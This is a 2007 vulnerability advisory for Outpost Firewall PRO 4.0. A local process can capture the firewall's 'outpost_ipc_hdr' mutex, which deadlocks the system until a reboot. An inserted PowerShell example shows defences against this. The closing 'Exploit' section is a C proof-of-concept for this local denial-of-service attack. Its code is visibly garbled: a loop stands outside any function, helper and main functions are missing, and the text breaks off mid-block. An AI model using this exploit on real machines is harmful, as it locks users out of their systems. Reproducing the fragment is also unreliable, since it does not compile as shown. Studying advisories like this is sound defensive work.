Outpost Enforcing System Reboot with 'outpost_ipc_hdr' Mutex Vulnerability
3 Jun. 2007
Summary
A vulnerability in the way Outpost Firewall handles an internal mutex called outpost_ipc_hdr allows a local attacker to capture this mutex. Outpost then misbehaves, which forces the user to reboot the system.
Vulnerable software:
* Outpost Firewall PRO 4.0 (1007.591.145)
* Outpost Firewall PRO 4.0 (964.582.059)
Outpost insufficiently protects its own mutex, outpost_ipc_hdr: an arbitrary process is able to open and capture it. While the mutex is captured, Outpost cannot use it for synchronization, and its internal mechanisms lock when they try to use it. Outpost uses this mutex every time a potentially dangerous operation is executed, so, for example, new processes cannot be run while the mutex is locked. After the mutex is released, all blocked operations complete. However, the release cannot be enforced, so the user is forced to reboot the system.
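The two defences that address the weakness described above, an explicit DACL on the named mutex and a bounded wait in place of an indefinite one, shown as an added PowerShell example that is not part of the original advisory and is not the vendor's code. It assumes Windows PowerShell 5.1 (.NET Framework); the mutex name and the functions New-RestrictedMutex and Invoke-Guarded are hypothetical.

```powershell
# Added example (constructed); assumes Windows PowerShell 5.1 (.NET Framework).
$name = 'Local\example_ipc_mutex'   # placeholder name, not a real product's

function New-RestrictedMutex {
    param([string]$Name)
    # Explicit DACL: ACEs only for the creating account and LocalSystem, so a
    # process running as any other user cannot open or wait on the mutex.
    $sec = New-Object System.Security.AccessControl.MutexSecurity
    $me  = [System.Security.Principal.WindowsIdentity]::GetCurrent().User
    $sys = New-Object System.Security.Principal.SecurityIdentifier('S-1-5-18')
    foreach ($sid in @($me, $sys)) {
        $rule = [System.Security.AccessControl.MutexAccessRule]::new(
            $sid, [System.Security.AccessControl.MutexRights]::FullControl,
            [System.Security.AccessControl.AccessControlType]::Allow)
        $sec.AddAccessRule($rule)
    }
    $createdNew = $false
    $mutex = [System.Threading.Mutex]::new($false, $Name, [ref]$createdNew, $sec)
    if (-not $createdNew) {
        # The object already existed, so its DACL was set by someone else.
        $mutex.Close()
        throw "Mutex '$Name' already existed; refusing to trust it."
    }
    return $mutex
}

function Invoke-Guarded {
    param($Mutex, [scriptblock]$Action, [int]$TimeoutMs = 2000)
    $held = $false
    try {
        # Bounded wait: a holder that never releases costs one timeout,
        # not a hang that only a reboot clears.
        try { $held = $Mutex.WaitOne($TimeoutMs) }
        catch [System.Threading.AbandonedMutexException] { $held = $true }
        if (-not $held) {
            Write-Warning "Mutex not acquired within $TimeoutMs ms; operation skipped."
            return $false
        }
        $null = & $Action
        return $true
    } finally {
        if ($held) { $Mutex.ReleaseMutex() }
    }
}

$m = New-RestrictedMutex -Name $name
$m.GetAccessControl().GetAccessRules($true, $false,
    [System.Security.Principal.SecurityIdentifier]) |
    Format-Table IdentityReference, MutexRights, AccessControlType
Invoke-Guarded -Mutex $m -Action { Write-Host 'guarded operation ran' }
$m.Close()
```

The DACL does not stop a process running under the same account as the creator, which is why the bounded wait is kept as a second layer.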
Exploit:
/*
Testing program for Enforcing system reboot with "outpost_ipc_hdr" mutex (BTP00002P004AO)
Usage:
prog
(the program is executed without special arguments)
Description:
This program calls standard Windows API to open and capture mutex. Then an attempt to create a child process
causes the deadlock. To terminate this testing program and to release the mutex press Ctrl+C.
*/
#include <stdio.h>
#include <windows.h>
void about(void)
{
  printf("Testing program for Enforcing system reboot with \"outpost_ipc_hdr\" mutex (BTP00002P004AO)\n");
  printf("Windows Personal Firewall analysis project\n");
  printf("Copyright 2007 by Matousec - Transparent security\n");
  printf("http://www.matousec.com/""\n\n");
  return;
}
void usage(void)
{
  printf("Usage: test\n"
         " (the program is executed without special arguments)\n");
  return;
}
/* Prints the code and system message text for the calling thread's last error. */
void print_last_error()
{
  LPTSTR buf;
  DWORD code=GetLastError();
  if (FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM,NULL,code,0,(LPTSTR)&buf,0,NULL))
  {
    fprintf(stderr,"Error code: %lu\n",code);
    fprintf(stderr,"Error message: %s",buf);
    LocalFree(buf);
  } else fprintf(stderr,"Unable to format error message for code %lu.\n",code);
  return;
}
  while (1)
  {
    HANDLE mutex=capture_mutex("\\BaseNamedObjects\\outpost_ipc_hdr");
    if (mutex)
    {
      printf("Mutex captured.\n"
             "Running system shell. This action will block the system.\n");